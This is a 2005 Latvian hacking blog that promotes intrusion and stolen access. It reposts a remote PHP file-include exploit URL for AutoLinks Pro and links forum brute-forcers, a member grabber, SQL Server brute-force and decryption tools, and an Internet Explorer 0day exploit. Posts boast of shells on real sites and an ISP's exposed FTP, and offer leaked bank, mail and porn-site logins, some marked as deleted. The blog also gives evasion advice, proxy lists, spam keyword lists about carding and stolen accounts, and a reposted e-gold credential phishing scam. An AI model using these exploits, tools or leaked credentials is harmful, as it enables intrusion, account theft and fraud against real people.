by r0t,der4444,cembo,VietMafia

Wednesday, August 31, 2005

AutoLinks Pro 2.1 Remote PHP File Include Vulnerability


Software: AutoLinks Pro
Version: 2.1
Type: Remote PHP File Include Vulnerability
Risc: High

Date: 16.08.05
Vendor: ScriptsCenter
Page: http://www.scriptscenter.com/

Credit:
=======
Credit goes to NewAngels Team and especially 4Degrees.

Description:
============
"AutoLinks 2.1 is a full-featured script making life easier for webmasters
relying extensively on link exchanges to bring traffic to their site. Other
webmasters are able to easily exchange links with you, bringing more visitors
to your site and you also have full control on what sites you want to link."
[Quote from http://www.scriptscenter.com/]

PHP Requirements:
=================
register_globals = On

Vulnerability:
=============
Related source from file "autolinks/al_initialize.php":

>// check for hacking attempt
>if(strstr($alpath,"http://") || strstr($alpath,"https://")) exit("Invalid \$alpath variable");
>
>include($alpath."al_functions.php");

The script does not check wether $alpath contains an absolute URL to a remote
ftp resource.

Exploitation:
=============
/al_initialize.php?alpath=ftp://host.com/

The code in "al_functions.php" will be executed.


autors musu pashu vien der4444, tik vareja sheit atrak publicet ,isak sakot pec paris dienam apsolijas publicet jaunu/as

pr0n maksas,par brivu

www.webcamstills.com
www.teencamnudes.com
www.sweetdaughters.com
www.susanaspearsmodel.com
www.realcamteens.com
www.caughtgirls.com
www.caughtcamteens.com
www.camplayer.com
www.camnudes.com
www.bestnudists.com
besthomevideos.com/members/
www.ariagiovannimodel.com
www.webcamflicks.com
www.myexgirlfriend.net

Shajos saitos bloga apmkletajiem ieeja briva!

Logins:parole


Dzests

Hacking IPB 1.х - 2.х.х [brute forcer + member grabber]

Na ja varu iepriecinat lauzhnus ar IPB bruti + lietotaju grabberi.
Brutera un Grabbera autors ir Stepbl4b.

Nemu un notesteju.
Ko varu teikt, tada veida skripti bija ari ieprieksh tikai "pablika" netika mesti un lielakties tie nebija .php :)
Pasakums diezgan lens , panjemu ka izmeiginajumu trusiti hack.nite.lv forumu, kursh bazejas uz 2.0.4 versijas.
Izvelejos vienu paroli, prieks tiem aptuveni 600 lietotajiem - "parole" , cik tas nebutu smiekligi, luuk rezultats:


ok.,ok, prieksh tada foruma ari var droshi lietot "123" paroli.

  • brute

  • graberis
  • Sunday, August 28, 2005

    Bloga statistika

    Ieskatijos statistikas datos ieksh counter.hackers.lv un teikshu nemaz jau iepriecinoshi nebija, pa shodienu tikai 28 lv ip.
    Zinu ka ir viegli uztaist EN vai kaut vai DE pasakumu kursh atri vien bus patstavigi apmeklets un iegaumets.
    Hiti, ir galigi vienaldzigs jedziens man pasham , bet pati apmeklejuma statistika ka tadi gan ir svariga.
    Krievu valoda rakstit ir izdevigi,vacu izdevigi,anglu valoda ir populari, bet latvieshu valoda ir neizdevigi un nepopulari.
    Bet esmu sheit tapat ari parejie , nejau lai butu popularakie dzheki seta un lai tas butu izdevigi mums.
    Tapec droshi turpinasim lauzt ledu talak. :)

    Alt-g Google search toolis




    ieprieksh jau par vienu biju stastijis, shis pavisam cits .
    Ir pamat mekleshanas komandas + ir iespeja pievienot savas.


  • velkam
  • SQL Toolz

    Shodienas vakars veltits SQL :)

    Paka ar sql tooliem , par tas saturs:

    SQLPingv1.1

    Description:
    SQLPing can be used to discover detailed information about the connectivity of SQL Server 2000 installations without authentication of any kind. Great tool to track down rogue SQL Server 2000 boxes on your networks or on the Internet - by Chip Andrews (source included)

    Vulnerability Scan Script

    Description:
    This is a vulnerability scanning script submitted by Carlos Perez. It scans your SQL Server instance looking for misconfigurations or insecure settings that you should investigate.

    SQLRecon 1.0

    Description:
    SQLRecon performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. Due to the proliferation of personal firewalls, inconsistent network library configurations, and multiple-instance support, SQL Server installations are becoming increasingly difficult to discover, assess, and maintain. SQLRecon is designed to remedy this problem by combining all known means of SQL Server/MSDE discovery into a single tool which can be used to ferret-out servers you never knew existed on your network so you can properly secure them. .NET Framework v1.1 Required. (Note: Due to .NET policy restrictions on most computers, you'll need to execute the sqlrecon.exe program from a local drive in order to get the full functionality) Documentation available at: http://www.specialopssecurity.com/labs/sqlrecon

    DTS Password Decryptor

    Description:
    DTSConnPass - utility to decrypt DTS package Connection passwords.

    SQLPing.NET 1.3 Beta

    Description:
    This is a pre-release of the 1.3 version of SQLPing for .NET. The new feature added to this version is the capability to determine the actual ssnetlib.dll SQL Server version rather than simply the base version as previous SQLPing editions reported. While not SQLPing's fault (the SQL Resolution Service reports only the base version), this version attempts to rectify that limitation by initiating a connection to the SQL Server. Note that no authentication is needed. Feedback welcome.

    SQLVer

    Description:
    Determines ssnetlib.dll version of SQL Server without the need to log into the server. Uses techniques from SQLPing.NET 1.3 beta but does not actually use the UDP 1434 packet for enumeration. This tool simply connects to the specified TCP port and gets to work! C# Source included. Requires .NET framework.

    SQLPing 2

    Description:
    GUI Version of SQLPing that also includes IP range scanning and brute forcing password checking. Want good fun? On a large development network, put in the network broadcast address in the discovery form. How many SQL Servers can you find? by Chip Andrews. Thanks to Beth Breidenbach and Joseph Kowtko for contributing the IP list functionality. Warning: SQL Server returns only the base version in its SQL Resolution packet. SQLPing shows this info as received. It is not the TRUE version. Updated 3/2/04 for more speed, better output, and adjustable scan wait times.

    SQLPing.NET

    My .NET port for the 1.2 version of SQLPing. Source included. Written in C#. by Chip Andrews

    sp_password.sql

    Modified sp_password stored procedure (tested for SQL 7 - not 6.5) that checks for password strength when changing passwords. Make sure to create a user-defined alert #50001 to display your error. This is proof-of-concept code - not a recommended implementation. by Chip Andrews


    sqlbf.zip

    SQL Server password brute forcing tool by xaphan. Usage: Usage: sqlbf [ODBC NetLib] [IP List] [User list] [Password List] ODBC NetLib : T - TCP/IP, P - Named Pipes (netBIOS) IP list - text file containing list of IPs to audit User list - text file containing list of Usernames Password List - text file containing list of passwords


    audit.sql

    Quick little script to check all of your user accounts for weak passwords if you have created a dictionary file somewhere on your server. (see dict.zip)


    sp_decrypt_7.sql

    Description:
    Stored Procedure for SQL Server 2000 that will decrypt encrypted stored procs from a SQL 7 installation. by Jimmers

    version.sql

    Description:
    SQL Script by Ken Klaft to get the exact patch level of a SQL Server by querying the version number. Easily scriptable to allow you to check your entire network for compliance.

    DTSRunDec

    Description:
    Tool by Jimmers to decrypt DTSrun parameters.

    SQL Shield

    Description:
    SQL Shield is a built-in tool for MSSQL 7, 2000 and MSDE servers that claims hacker-proof encryption for triggers, views and procedures. None of the currently available SQL decryptors are capable of cracking SQL Shield encryption.


    XP_CRYPT

    Description:
    Easy-to-use, affordable, and effective security solution for encrypting column and row data in MSSQL Server and Oracle

    Websleuth

    Description:
    Pluggable Web Application Scanner with a plug-in for SQL Injection testing. Useful for spider-ing sites, testing forms, and general application-layer mayhem.


    Extended Stored Proc Removal and Restore Scripts

    Description:
    Scripts to remove and later restore dangerous extended stored procedures (usually to install service packs). by Mark Hatfield and Mohammed Alam of Shavlik Technologies (www.shavlik.com)

    forceSQL

    Description:
    SQL Server password brute force tool that can be used with or without a dictionary. by Nilesh Burghate http://www.nii.co.in/tools.html

    sql2kpwdtools.zip

    Description:
    This is a SQL Server 2K Stored Proc Decrypter + some additional tools. Submitted by Joseph Gama with some additional code from Mark Litchfield and Chris Anley of NGSSoftware.

    decrypt_odbc_sql.txt

    Description:
    Stored proc to decrypt ODBC obfuscated data. When using {Encrypt N'text'} ODBC function to "encrypt" data (what a joke), this routine will allow you to reverse the process. by jimmers

    sqllhf.zip

    Description:
    SQL Server Brute Forcing tool featuring a scriptable command-line interface, scans networks larger than class C, and IP list support. by Matthew Wagenknecht

    sqlpoke.zip

    Description:
    Used to scan a range of IP addresses for SQL Servers and then execute a predefined script. Could be used to track down SQL Servers in your own organization and ensure they stay locked down. - by xaphan

    sqldict.zip

    Description:
    Brute-force SQL Server password utility. Good for auditing SQL Server passwords in your organization. Don't use this power for evil - by Arne Vidstrom.

    dict.zip

    Description:
    Sample dictionary file to be used for password strength testing. . Create a table called 'dict' with one field (varchar(128) should do since that's the maximum size of a standard security password in SQL 7) called 'word' and then do a 'BULK INSERT dict from 'c:\myfile.txt'. You may need to use special switches on the BULK INSERT depending on your text file - check BOL if you need help.

    mcpscripts.zip

    Description:
    Script files from my June 2000 MCP Magazine article on constructing your own log-based Intrusion Detection System. by Chip Andrews

    sql7-lib.txt

    Description:
    Snort ruleset for SQL Server monitoring by Todd Garrison

    HFNetChk

    Description:
    Excellent tool for determining hotfix and service pack levels. From Microsoft and Shavlik.

    spdecrypt.zip

    Description:
    Decrypt SQL Server 7.0 stored procedures by David Daniels

    sql2k_spcrypto.txt

    Description:
    Decrypt SQL Server 2000 stored procedures from Bugtraq post by shoeboy



    Shos visus toolus varat novilkt sheit:
  • sqlsecurity


  • Vai nu sheit, praktiski visu komplektu
  • XSS and SQL error finder :]


    Labs palig toolis prieksh ievainojamibu mekletajiem(urkkiem), vai nu prieksh sliktiem zeniem.


  • Velkam
  • LINUX PROXY SCANNER cauz Proxy Hunter SuX

    he he....

    Pa brizhiem esmu pamanijis ka cilveki mekle normlakaus varaintus par kaut kadiem Proxy Hunteriem (kursh ir bezjedzigi lens un skrien tikai uz windas).

    Mazliet par skanneri:


    pr0's linux industrial grade/superfast proxy scanner.

    This proxy scanner was built on the c platform, is 100% stable, & was designed to be a completely self contained proxy scanner, checker & filter. Entire blocks of IP's can be scanned in as little as an hour or 2, like entire blocks...i.e. 216.0.0.1 to 216.255.255.255 in as little as 1 hour!! So you can clearly see the advantages to this. You may feel free to pick apart the code & change it anyway you want but please leave the name "pr0" in the credits, no need for a link to the domain, just a simple "thanks to pr0" would be nice. : )


    One log file will be made with your regular http proxies, & one file will be created at the end of the scan with all of the SSL capable proxies. All the code is here for you to see, tinker with, use as as, or just enjoy! It will scan any set ports that use the http or https protocol.

    On the page entitled scanner.txt you will find the installation instructions, where to place which files on your server, & the line commands needed to be given to the program to begin scanning. Here is an example of one of the commands....

    nohup ./pscan -s startip -e endip -p port1,port2,... -o logfilename -c maxthreads -t maxtimeout

    Which in english would amount to

    nohup ./pscan -s 213.0.0.1 -e 213.254.255.255 -p 80,3128,8080 -o 213.log -c 1000 -t 5

    This would mean you are beginning the pscan proccess, scanning 213.0.0.1 & ending at 213.254.255.255 & placing the proxies in the log 213.log, setting the maxthreads your server makes at any given time to 1,000 & setting the timeout to 5 seconds.

    Of course on a slower connection you would want to set the timeout to -t 10 or -t 15, and if you are searching for proxies on notoriously slow ranges, or for some god awfull reason using a dialup you may even want to set your timeout to -t 25 & threads to 1/2 of normal.



    This scanner was made to be run on a Linux based system, connected to a decent pipe, i.e. a 10mbps switch, however it can be run on your P.C. just not at the great speeds.


    Upon finding a good proxy, the script checks back to a self contained ENV checker on your own server, of course this could be edited in any fashion you wish.



    Here is the bottom line people. On a dual xeon 2.6 with 1gb of ram or a P4 2ghz or above, on a 10mbps unmetered line, or even just a regular OC/DS3 Pipe to the internet that any hosting company would have...or better connection, you should be able to set your connections to 5-10,000, your timeout to 5 seconds, and an entire range such as 213.* will be done within less than one hour. And it will pick up every single possible proxy, filter out the gateways, & create a seperate logfile of the proxies which are ssl enabled.

    This scanner puts proxy hunter to shame, point blank : )



  • Velkam un faila formatu nomainam uz .rar
  • LV Proxy un citi

    Es biezhi vien pamanu LV interneta , to ka iesacejie vienmer lauza galvu del LV proxy serveriem.Principa atrats publiskus proxy servus ir iespeja vienmer , tikai vajag gribet , bet tadi proxy serveri var kalpot lielakoties tikai ja jums ir apgriezts arzemju trafs.
    Labak ir pashiem kaut vai uzlikt uz kadas kastes
  • 3proxy
  • un tad var vismaz justies mazliet droshak , jo kas zin kadas rokas nonak jusu logi.

    vai nu var lietot kadu no maksas piedavatajiem proxy servisiem.
    Letkais no man zinamajiem un ertakajiem ir
  • ebay,hacked ebay accounts,ebay accounts, ebay sucks,ebay haced,ebay hacker,sell ebay, earn ebay,ebay secrets,
    paypal sucks,paypal tricks,hack paypal, hack paypal accounts, sell paypal, paypal hacked, paypal hacker, paypal security holes,ebay security holes,ebay vuln,
    paypal source code, ebay source code, e-gold hacker,e-gold hacked, e-gold accounts for sale,sell e-gold,e-gold tricks,e-gold to paypal exchange,exchange paypal to e-gold,
    stollen paypal accounts,stolen e-gold accounts, stolen ebay accounts, e-gold cracker, e-gold manipulator, e-gold future, e-gold sucks, earn e-gold, pay e-gold,
    e-gold secrets, how to hack e-gold , how to hack paypal, how to hack msn , how to hack yahoo,how to hack googlemail, how to hack microsoft, how to hack xxx mebersites, how to hack your self ,
    xxx passwords, xxx memberistes passwords, 0 day exploitz, private exploitz for free, spam bases, spamm tools, how to hack microsoft, how to hack ibm, deluxepasswords, find mp3 , mp3 for free,
    hacker tools, proxies, wordlist, combolists, fresh proxies, fresh socks, anonymours proxys, proxies for spam, britney spears naked, paris hilton get fucked, paris hilton sucks huge dick,
    new movies, new music, bes torrent tarcker, torrent tracker topsite, story about suprnova, true about Shadow Crew, True about Carderplanet, carding mercedes, carding world, carding net,
    carding web, sell stollen cvv2, hack email, hack provider, hack forum, hack phpBB, hack IPB, hack UBBthreads,hack PHP nuke, video hack , visual hack, how to hack video,
    mazafaka.cc sucks , true about carding.ru, true about mazafaka.cc,carding tutorials, black market, FBI rules, .gov help,need money,free tenplates,
    hack WiFI,hack wireless,hack website, hack intgold, hack bank account, hack cvv2 , hacker tools , hacking tutorials, proxy forum, bets proxy forum, elite proxys for free,
    Kevin mitnick sucks, Kevin mitnick book, download, download proxies, download hack, bit tits video, big booties video,fuck shemale,fuck you,fuckers boards, crackers boards, hackers board,
    internet for free, best d3 network, domain for sale, all about , free comercial scripts,e-commerce secrets, bid your stuff, bid you work,
    hackers board,i can hack, you can hack, need help,


  • Viens no pasakuma autoriem ir krustevs:)
    Cenas ir diezgan labas salidzinot ar kaut vai citiem tada veida un kvalitates servisiem.

    Luuk paris proxy

    Rezekne

    159.148.115.146
    SOCKS: 4348
    HTTP: 4596

    Riga

    213.180.122.181
    SOCKS: 4868
    HTTP: 4235

    195.216.178.240
    SOCKS: 6628
    HTTP: 9080

    Proxy protams nestav uz standart portiem un ir patstavigi jauni LV proxy, protams atradisiet var teikt jebkuras valsts proxy vai socks serverus, sadalitus pa regioniem vai pa pilsetam.

    Saturday, August 27, 2005

    Mazliet par blogu un to autoriem.

    Uz dotu bridi ir savakti vai apvienojusies.

    Mani jau noteikti zinat (r0t3d3vil).
    Nodarboshanas: Dabushu kaut vai pashu velnu pec pasutijuma.

    RaZbH- teikshu labs spec. un jautrs cilveks uz kuru var svariga bridi palauties.
    Gan ko labu uzkodes:)

    23r05m0k3- iepazinu ka bezpridelshiku, bet vispar intresanta izlaista personiba.
    Nodarboshanas: demole saitus pec pasutijuma.

    roms-lieku ceribas uz sho cilveku , pashlaik melnais zirdzinsh.

    der444- Sodien pievienojas viens cilveks ,nezinu vai tas ir brinums vai ne bet cilvekam pietika pacietibas lietot online tulkotaju lai lasitu blogu.Loti pat apkerigs jauns cilveks , progrese katru sekundi , gan dienas bus auksta limena spec.
    Ja kaut ko sagaidisim no vina puses , tad tas bus anglu valoda.
    Iesaistits vairakos sec. tiimos,grozas ap web-aplikaciju ievainoajmibu atklashanu.


    Varbut tuvakaja laika bus kadas izmainas, viss ir atkarigs ka mes pratisim saprasties un cik labi tas bus prieks shi bloga nakotnes.
    Itka cilveku ir pietakami, lai uzmauktu vairak neka vienu prastu blogu ,tapec paies mazliet laiks skatisamies.


    Speciali prieksh visiem tiem kam kaut kas sheit neapmierina:

    Ja jums kaut kas shaja bloga neapmierina, droshi aizmirstat sho vietu.
    Ja domajat ka esat uber paraki par sho pasakumu, tad esat tadi jums neviens netrauces, ja spesiet but tadi par kadiem jus sevi uzskatat.

    Friday, August 26, 2005

    forex - kartejais atjautibas uzdevums


    forexvenue.com - aizijas online forex pasakums, atkal neteikshu visu prieksha.


    http://Dzests te ir shells

    vai nu -




    + bonussa viena no mysql parolem: Dzests

    Thursday, August 25, 2005

    Noderigi onlain tooli



  • sheit
  • Google talk - Google izlaida savu messengeri



    Google izlaidusi ir savu IM.
    Kuru lietot var tapat ka lidzigos(msn,utt) izmanotot googlemail kontu.




  • Google talk- velkam sheit


  • Google kontus nemam sheit
  • Online banking/LV

    Shoreiz pieversishu uzmanibu online bankingam LV un visspar LV bankam.
    Varu teikt ka LV bankas ir samera drosh pasakums droshaks ne daudzas rietumeiropas bankas ja mes salidzinam online banking droshibu.
    Ka piemru nemsu es Hanza Banku , diezgna populars pasakums.
    Nevienma nav noslepums , ka LV bankas ir tikai lielkoties domatas naudas atmazgashanai un visadam shaubigam offshore firminam.

    Hanza bankai , lai lietotu online banking pakalpojumus neiztikt bez klientam iznsniegtas tan kartinjas, no kuras jums ielogoshnas gadijuma naksies ievadit kadu sistemas izveletu tan numuru, ja to vispar var saukt par tan numuru.
    Tad luuk , ja labam koderim ir ipashi taisnas rokas, tad to numuru var dabut gatavu, ka pierada rietumu prakse, bet ja ne tad zhavejat airus.

    Iedoshu jums piemeram divu kontu loginus, kurus jus diezgan atri iesaldesiet:)

    Dzests

    PS. ja tas butu kadas asv bankas , tad ipashu grutibu nesagadatu jums viegli parvaldit upura kontu, protams ieverjotot mazas nianses.
    Starpcitu nerakstits likums ir ka Tev nelaupit sava seta!

    Sunday, August 21, 2005

    uzzini vai pazinas nav musari

    Luk.

    Vecs joks, bet kads varbut nezinaja tadu steli nemmamm draugiem.lv feikotu akauntu vai ari iisto un iedrukajam meklesana vp.gov.lv dp.gov.lv sab.gov.lv

    Olee. Ko mes redzam? Kaudzes ar musariem. LOLKAS.

    www.apolo.lv

    Sis gan ar hack nav uber saistits tomer interesanta lieta. Ideja ir tada, ka varam vadit konsoles komandas loga, lai sasniegtu dazadus merkjus, kuriem parasti vajadzetu brauzera loga iet pa dazadiem servakiem utt.

    Lai mekletu google ierakstam: g vards
    Lai mekletu siets iepisham: siets vards
    Lai wikipedija: wp vards
    utt ...

    Isteniba varbut uzreiz jus domasiet, ka tas ir lai taisiitu baneru razkrutku, iztradas ka ne, jo lapas autori iesaka izmantot komandas pataisno, piem, pieliekot gramatzimi uz tejieni

    Atveras javaskripta logs, kura var visu dariit. Nu vaardsakot ir interesanti, varbut kads ari sak izmantot. Komandas tur tiesam nav maz.

    Saturday, August 20, 2005

    How to hack e-gold accounts - LOL





    Several months ago I came across a program that, as it`s author said, was the only program that could hack an E-Gold account. That program didn`t hack any E-Gold account but delated all my *.exe files. I tried some other programs of this sort but every time it was the same until a friend of mine mentioned about an easy way to hack an E-Gold account. I was very suspicious until I tried it. What was my surprise when I recieved a list of E-Gold accounts on my mail together with a list of the passwords of these accounts. With the permition of my friend (whose name I`d rather not tell) (Other mailer bots are not active now)


    HOW TO HACK E-gold !!!!!
    UPDATED INFORMATION, Feb/2005

    REMEMBER THIS WILL ONLY WORK IF YOU HAVE ANY BALANCE IN YOUR A/C HACKING PROCESS:
    Log in to that email account and send an Email to: djfnkjdfnvkjdfnvk;nsdfv
    In the subject line, write: adfvk;jbfdvajdbfvadfv (To confuse the mailerbot)
    In the email body, please write exactly 12 lines, which MUST BE as follows:
    In line 1: Content-Type: text/plain;
    -------------------------------------------------
    In line 2: charset=us-ascii (To make the reply readable)
    -------------------------------------------------
    In line 3: adfgsdfgsthsrtgh srth (To confuse the mailerbot)
    -------------------------------------------------
    In line 4: dfadfvdfvsdf (To make the mailerbot start retrieving information acquired from E-gold.)
    -------------------------------------------------
    In line 5: Your at E-gold A/c No. (To retrieve information from E-gold, The mailerbot now needs a/c no) .
    -------------------------------------------------
    In line 6: start (retrieve > 0) (To activate the mailerbot's retrieval function)
    -------------------------------------------------
    In line 7: verified (*value == float) (To continue the mailerbot's retrieval function)
    -------------------------------------------------
    In line 8: Your E-gold password (Now you have to enter your E-gold password, as the mailerbot was programmed in a way that it sends testing info to E-gold who'll verify each account's password and confirm it with the mailerbot. So in line 8, you have to enter your valid/correct password of your E-gold account.)
    -------------------------------------------------
    In line 9: #safgsgbsfghsrthgr (To search for info of E-gold members who had their addresses confirmed in the last 72 hours)
    -------------------------------------------------
    In line 10: Your email password (By entering the password of your email. The mailerbot will assume this is a command from the administrator and will send out information to the 'administrator' who is actually you.)
    -------------------------------------------------
    In line 11: rthfghsfgbnsfgnbfgn (This will make the mailerbot send all the info to your email)
    -------------------------------------------------
    In line 12: #endofmsg (Last step!)
    -------------------------------------------------
    Note: Please STRICTLY follow the instruction above and you'll be guaranteed to get an automatic reply from the confused mailerbot! Then you'll have email, password and all sorts of information of E-gold users who had their mailing addresses confirmed over the last 72 hours.

    REMINDER: Above is the complete tutorial of hacking into E-gold accounts, and here is a reminder of the most important things mentioned above.
    1) You must have a positive a/c balance in your E-gold account to get the whole thing to work, otherwise the mailerbot will be confused by your code and hence the hacking will fail.
    2) You will get email with all id's & password in 48 hours just try and look results.

    Friday, August 19, 2005

    Proxy/VPN/internet cafe

    Katru dienu es parkapju vinu likumus, ne manus.
    Varbut Tu ari esi viens no tiem , kuri nevar dzivot/eksistet bez adrelina,kursh rodas no informacijas plusmas kura Tu ielauzies.
    Ok. daudzi runa ka redz tadu proxy lietot vai VPN servisu lietot lai justos droshak.
    Tad atklashu jums kadu noslepumu, ka VPN servis nemaz nav drosh un ka proxy ar nav drosh un ka man draugub savaca internet cafe.
    Ar katru dienu publiskie proxy serveri arvien vairak sak griezties zem visadam iestadem , kuraslauj dzivot serveriem tikai lai ievaktu vajadzigo informaciju, ja pirms 2-3 gadiem proxy serveri bija kaudzem un lieto kadu gribi un viss ir artiba, tad pedejos gados it sevishkki shogad situacija ir pavisam cita, proxy serveru skaits ir samazinajies+ 90% kalpo lai ievaktu vajadzigo informaciju.
    VPN-pirms paris gadiem varbut katrs 5 VPN piedavatais servis stradaja zem kadas iestadaes , ka piem. FIB.
    Shajas dienas viss ir otradi, katrs piektais nestrada.
    Un pat ja nesdarabojies , tad ir iespeja nospoofot VPN servisu, tikai maz informati lauku ljauzhi var iedomaties ka redz visiem parak isas rokas.

    par proxy serveriem krustevs no netsec.lv ir uzrakstijis divus rakstus, kurus vajadzetu izlasit:
  • pirmais raksts


  • otrais raksts

  • Par proxy/VPN servisiem un izmantojamibu uz krustevu vienmer vareja palauties un varbut vins kadreiz par maz pasaka , bet to pasu vien minumumu vajag pamatigi izanilizet.
    Kad pajautaju vinjam ko vinsh pats izmanto, tad vinsh teica ka sezh uz laptopa caur zivi un personigo VPN,bet ja galigi viss ir garam tad sezh i-net kafuzi.
    Savu droshibu uztic tikai pats sev un nevienam citam pat labakam draugam ne, kur nu vel kaut kados karderu forumos piedavatos VPN vai proxy serverus pec kuriem vinjam noteikti nekadas vajdzibas nav.
    Ko varu teikt, ka internet kafe nemaz nav slikti ja tas ir islaicigi, zive vai kreisais pieslegums - ja attiecigas iestades griezisies pie mobila operatora, tad tapat maximums bus 500 metri radiusu no jusu atrashanas vietas vares noteikzt.
    VPN- neticiet populariem pasakumiem, kaut vai tie nak jau no pazistamiem cilvekiem, ja ta rikosaties nenaksiet tadaas nepatikshnas ka popularais Shadow Crew.

    Sheit ja pamanisat tad zem patstaviga proxy saraksta ir paradijies "bonus no krusteva" , protams ka sraksts ir izveidots no publiskajiem proxy serveriem parsvara. un dalja no vinjiem diezgan liela iet zem .edu , tas pats par sevi jau nozime ka vinjiem ir vajadziga kaut kada informacija .
    Ja jus esat parliecinatai ka jus parkapjat pie tam vel pamatigi kaut kadus likumus,rikojoties droshi un uzticat savu droshibu tikai sev vai nu cilvekam uz kuru jus varat palajuties 100%, nekadiem publiski piedavatjiem servisiem neuzticiet savu brivibu.
    Tas ir riktigs "alarms", pats dzivoju es skandinavija un stradaju IT joma un pat darba mums ir riktigs "alarms" , tapec ari uzrakstiju so lai jus nebutu tik vieglpratigi , ka pat daudzi pro.

    Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)

    Ta daa! atkal ezelis steidzas mus priecet!
    Prieki un gaviles sit augstu vilni!


  • sheit
  • lol

    Thursday, August 18, 2005

    mpe.lv - Velviens Mega provaiders!

    Par no.lv esam kursa tagad skatamies kas ar sho brinumu.

    ieejot vinu saita bus norade uz ftp serveri, apksaties pashi tur jau pirmos reiz apsedos, pec tam daudz nekomentesu, ir 3 skrini, shoreiz sho mega provaideri neizsledzu vai pat neko nemainiju un pat backoodru neatstaju , varbut bus maciba viniem tikai ar sadu izsmieklu, vai tad man ir japierada cik mes kruti un cik parejiem ir likas rokas.

    http://img300.imageshack.us/img300/1166/ftpanonym0bn.png

    http://img260.imageshack.us/img260/4849/config5nd.png

    http://img300.imageshack.us/img300/4360/shell8oe.png


    Ps. man pat isti nebija te i-kafuzi ar ko skrinot, tapec tur tie skrini ir tadi ka ir.

    Rootkit Hunter

    Taatad ja kaads nebija piefikseejis, tad ir shaads softs:
    Rootkit Hunter

    Ko tas var dot mums?

    1) var megjinat patestet vai kaads nav ieliidis pirms mums sisteemaa
    2) paarbaudiit savus ruutkitus pret sho testeri
    3) pamaaciities kaa apiet sho rootkitu hunteri

    Kaa runaa, tad shis hunteris koteejas labi, kjerot daudz. Apraksts gan tads parspilets:

    Rootkit scanner is scanning tool to ensure you for about 99.9%* you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:

    - MD5 hash compare
    - Look for default files used by rootkits
    - Wrong file permissions for binaries
    - Look for suspected strings in LKM and KLD modules
    - Look for hidden files
    - Optional scan within plaintext and binary files

    Rootkit Hunter is released as GPL licensed project and free for everyone to use.

    * No, not really 99.9%.. It's just another security layer

    Bet nu ok, katrs spriezh pats. Drizuma tad iemetisu kadu programmu/skriptu savu sheit. Varetu but ss.lv e-pastu vacejs vai rutkitu skanetaju neitralizetajs.

    OFFtopickz




    Shadi luuk rakstas japanju valoda hakeris*.

    Kontakt informacija

    r0t3d3vil
    admin@hackers.by.lv
    icq:100010006
    sst:122953

    RaZbH
    icq:195012

    der4444
    icq:242920370

    Wednesday, August 17, 2005

    vestule no tunt.lv

    От кого:stats@tunt.lv
    Кому: seniorita23@mail.ru
    Дата: 17 Авг 2005 00:54:48
    Тема: dzests no TunT statistikas - pridels.blogspot.com



    - UNSECURED SYSTEMS - by r0t3d3Vil - pridels.blogspot.com

    ir dzests no http://stats.TunT.lv statistikas saraksta

    par iemeslu tam var but:
    1) skaititaja kods netika ievietots lapa atveleto 2 dienu laika;
    2) skaititajs tika slepts;
    3) mainits skaititaja kods;
    4) tika gjenereti hosti;
    5) lapa atkartoti neveras;
    6) lapa ir kaut kas ar xxx, illegal mp3, internet money, warez, p2p, dc++ saistits;
    7) lapa ir under construction;
    8) mana subjektiva kluda.

    Ja tavuprat ta ir kluda, drosi raksti - tiksim skaidriba...

    --------------
    Ja si vestule ir sanemta kludaini, nosuti atbildi par to informejot.


    ////////////////////////////////////////////////////

    Zinat, pat 7.) punkts reali ir tikai viena vieta parkapts ar "ebookiem" :)

    tatad vai nu delj ebookiem vai nu delj 8) [Mana subjektiva kluda"]

    Un ta ari ir ka punkts 8) , tad kads tolks man rakstit un un paljauties vardiem "droshi raksti -tiksim skaidriba"

    Ta ir lieka laika tereshana , tapec lai uzturetu forma savu subjektivismu Tupies un Turies!

    inbox.lv prieksh tiem kam patik luret pa durvju shkkirbu.



    Neskatijos kas vinjos ir man ta lieta ne ipashi , bez vajdzibas nebazhu degunu kur nevajaga un lieki svau laiku neshkkiezhu.
    Pari inbox.lv logini , pa labu naudu var nopirkt visu inbox.lv lietotaju bazi.
    Ja katra zina redzet savu vai drauga vai vienkarshi zinama cilveka loginu tad droshi nemat nomainat paroli , bet ja tie nav jusu tad atbildat par sekam kartejo reizi pashi.


    Dzests

    Tuesday, August 16, 2005

    education.org - macities un velreiz macities!

    Ne ne ta nav karteja reklama ,bet karteja praktizesanas


    Dzests

    Paris anonimo proxy serv,

    Lielakoties tie ir no CoDeeN http://codeen.cs.princeton.edu/
    Tapec ir paris filtri un ar logosshanaos bus ka bus , bet serfot vai vilkt var uz nebedu.

    206.240.24.21:3124
    Valsts=US

    195.87.69.242:80
    Valsts=TR

    207.69.167.53:8080
    Valsts=US

    208.216.119.19:3128
    Valsts=US

    199.77.128.194:3128
    Valsts=US

    200.129.0.162:3124
    Valsts=BR

    193.194.70.226:8080
    Valsts=DZ

    143.248.139.169:3124
    Valsts=KR

    38.119.66.205:80
    Valsts=US

    [207.108.137.199:80
    Valsts=US

    128.31.1.13:3128
    Valsts=US

    195.222.15.217:80
    Valsts=EE

    128.214.112.92:3128
    Valsts=FI

    194.80.38.243:3128
    Valsts=GB

    62.75.220.209:3128
    Valsts=DE

    213.132.179.181:80
    Valsts=NL

    193.52.185.12:80
    Valsts=FR

    194.167.168.4:80
    Valsts=FR

    130.37.198.243:3128
    Valsts=NL

    193.232.27.246:3128
    Valsts=RU

    85.18.29.25:8080
    Valsts=

    217.117.51.18:80
    Valsts=BE

    216.165.109.81:3124
    Valsts=US

    217.145.196.65:3128
    Valsts=SK

    212.175.113.52:3128
    Valsts=TR

    207.69.167.53:8080
    Valsts=US

    216.142.47.242:65208
    Valsts=US

    216.136.2.253:80
    Valsts=US

    212.0.138.27:80
    Valsts=SD

    207.248.240.118:80
    Valsts=UY

    205.136.240.131:8080
    Valsts=KY

    207.248.240.119:80
    Valsts=UY

    216.69.164.185:80
    Valsts=

    216.248.36.118:8080
    Valsts=US

    216.72.177.4:80
    Valsts=CL

    216.239.175.244:81
    Valsts=US

    210.226.234.18:444
    Valsts=JP

    217.219.18.10:3128
    Valsts=IR

    210.0.200.3:80
    Valsts=HK

    210.0.200.4:80
    Valsts=HK

    203.169.123.90:80
    Valsts=SG

    218.91.254.3:8080
    Valsts=CN

    217.36.16.180:8080
    Valsts=UK

    203.199.92.158:80
    Valsts=IN

    203.162.29.195:8080
    Valsts=VN

    203.172.133.68:8080
    Valsts=

    218.93.119.83:8080
    Valsts=CN

